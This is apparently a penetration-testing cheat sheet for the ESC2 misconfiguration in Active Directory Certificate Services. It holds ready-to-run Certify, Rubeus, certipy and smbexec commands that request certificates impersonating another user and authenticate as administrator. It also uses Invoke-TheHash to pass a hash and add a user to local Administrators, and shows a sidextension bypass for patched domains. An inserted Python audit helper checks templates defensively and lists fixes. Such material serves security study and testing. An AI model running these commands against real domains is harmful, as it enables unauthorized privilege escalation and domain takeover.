ESC2
This privilege escalation technique requires the following:
- Any Purpose EKU, which allows the attacker to get a certificate that can be used for all purposes (Client Authentication, Code Signing, ...)
- ENROLLEE_SUPPLIES_SUBJECT attribute enabled
- a user with enrollment rights
To make it easier to remember, the only difference between ESC1 and ESC2 is the required EKU. If, for some reason, a certificate template is configured with no EKU, we will be able to use it just like a template with Any Purpose EKU.
Windows
Enumerate ESC2 vulnerability
PS /home/bobbuilder> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*))))' -SearchBase 'CN=Configuration,DC=local,DC=lab'
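The LDAP filter above only tests the EKU, manager-approval and RA-signature attributes; it does not check the ENROLLEE_SUPPLIES_SUBJECT flag or who can enroll, so it over-reports. The following audit helper, added here as an example and not part of the original page or any tool it mentions, evaluates all the ESC2 conditions listed above against template records. The attribute names (pKIExtendedKeyUsage, msPKI-Enrollment-Flag, msPKI-RA-Signature, msPKI-Certificate-Name-Flag, which holds the ENROLLEE_SUPPLIES_SUBJECT bit 0x1) are the real AD CS schema names; the sample records, the flattened `enroll` field standing in for the template ACL, and the LOW_PRIV_GROUPS set are constructed assumptions for the demo.

```python
# Added audit helper: classify AD CS certificate templates against the ESC2
# conditions listed above. The records below are constructed samples, not data
# from any real domain; in practice they would come from the LDAP query shown
# above (pKICertificateTemplate objects under CN=Configuration).
from dataclasses import dataclass

ANY_PURPOSE_EKU = "2.5.29.37.0"            # anyExtendedKeyUsage, as in the LDAP filter above
CLIENT_AUTH_EKU = "1.3.6.1.5.5.7.3.2"      # used only for the "safe" sample below
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1    # bit in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x2            # bit in msPKI-Enrollment-Flag (manager approval)

# Groups treated as "low privileged" for the enrollment-rights condition (assumption).
LOW_PRIV_GROUPS = {"Domain Users", "Authenticated Users", "Domain Computers"}


@dataclass
class Template:
    name: str
    ekus: list                  # pKIExtendedKeyUsage values; empty list = no EKU
    certificate_name_flag: int  # msPKI-Certificate-Name-Flag
    enrollment_flag: int        # msPKI-Enrollment-Flag
    ra_signature: int           # msPKI-RA-Signature; 0 when the attribute is absent
    enroll_principals: set      # principals holding Enroll (simplified from the ACL)


def from_ldap_entry(entry: dict) -> Template:
    """Build a Template from a dict keyed by the LDAP attribute names above."""
    return Template(
        name=entry["cn"],
        ekus=list(entry.get("pKIExtendedKeyUsage", [])),
        certificate_name_flag=int(entry.get("msPKI-Certificate-Name-Flag", 0)),
        enrollment_flag=int(entry.get("msPKI-Enrollment-Flag", 0)),
        ra_signature=int(entry.get("msPKI-RA-Signature", 0)),
        enroll_principals=set(entry.get("enroll", [])),  # hypothetical flattened ACL field
    )


def check_esc2(t: Template, low_priv=LOW_PRIV_GROUPS):
    """Return (vulnerable, checks): every ESC2 condition must hold for 'vulnerable'."""
    checks = {
        "any_purpose_or_no_eku": not t.ekus or ANY_PURPOSE_EKU in t.ekus,
        "enrollee_supplies_subject": bool(t.certificate_name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        "no_manager_approval": not (t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS),
        "no_ra_signature_required": t.ra_signature == 0,
        "low_priv_can_enroll": bool(t.enroll_principals & low_priv),
    }
    return all(checks.values()), checks


def audit(entries, low_priv=LOW_PRIV_GROUPS) -> list:
    """Names of templates meeting all ESC2 conditions, i.e. the defender's fix list."""
    return [t.name for t in map(from_ldap_entry, entries) if check_esc2(t, low_priv)[0]]


# Constructed sample records (not from a real domain).
SAMPLE_ENTRIES = [
    {   # Any Purpose EKU + enrollee supplies subject + Domain Users can enroll: ESC2
        "cn": "AnyPurposeUser",
        "pKIExtendedKeyUsage": [ANY_PURPOSE_EKU],
        "msPKI-Certificate-Name-Flag": 1,
        "msPKI-Enrollment-Flag": 0,
        "enroll": ["Domain Users"],
    },
    {   # No EKU at all: treated like Any Purpose, as noted above; still ESC2
        "cn": "LegacySubCA",
        "msPKI-Certificate-Name-Flag": 1,
        "enroll": ["Authenticated Users"],
    },
    {   # Same template but manager approval required: not ESC2
        "cn": "AnyPurposeApproved",
        "pKIExtendedKeyUsage": [ANY_PURPOSE_EKU],
        "msPKI-Certificate-Name-Flag": 1,
        "msPKI-Enrollment-Flag": 2,
        "enroll": ["Domain Users"],
    },
    {   # Client Authentication only and subject built from AD: not ESC2
        "cn": "ClientAuthOnly",
        "pKIExtendedKeyUsage": [CLIENT_AUTH_EKU],
        "msPKI-Certificate-Name-Flag": 0,
        "enroll": ["Domain Users"],
    },
]

if __name__ == "__main__":
    for entry in SAMPLE_ENTRIES:
        vuln, checks = check_esc2(from_ldap_entry(entry))
        unmet = [k for k, v in checks.items() if not v]
        print(f"{'ESC2' if vuln else 'ok  '} {entry['cn']:<20} unmet conditions: {unmet or '-'}")
```

Templates that come back from `audit()` need at least one of the conditions broken: replace the Any Purpose (or empty) EKU with the specific purposes actually needed, clear ENROLLEE_SUPPLIES_SUBJECT so the subject is built from AD, or require manager approval and restrict Enroll to the intended group.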
Requesting a certificate
PS /home/bobbuilder> .\Certify.exe request /ca:<ca_name> /template:<template_name> /altname:user1@minions.com
Convert Certificate
Certificate Authentication
PS /home/bobbuilder> .\Rubeus.exe asktgt /user:user1 /certificate:cert.pfx /getcredentials /nowrap
PassTheHash using Invoke-TheHash
PS /home/bobbuilder> Set-ExecutionPolicy Bypass -Scope CurrentUser -Force
PS /home/bobbuilder> cd .\Invoke-TheHash\;Import-Module .\Invoke-TheHash.psm1
PS /home/bobbuilder> Invoke-TheHash -Type SMBExec -Target localhost -Username Administrator -Hash your_hash -Command "net localgroup Administrators user2 /add"
Linux
Certificate Request with alternative SAN
bob$ certipy req -u 'user1@minions.com' -p 'password1' -ca <ca_name> -template <template_name> -upn user1
Certificate Authentication
bob$ certipy auth -pfx administrator.pfx -username administrator -domain minions.com -dc-ip <ip>
Verify
bob$ KRB5CCNAME=administrator.ccache smbexec.py -k -no-pass minions.com
ESC2 in CBA-Patched Environments
Once again, if working in a CBA-patched environment we can use Certify's (or Certipy's) sidextension argument
PS /home/otter> .\Certify.exe request /ca:<ca_name> /template:<template_name> /altname:administrator /sidextension:<domain_sid>-500 /domain:minions.com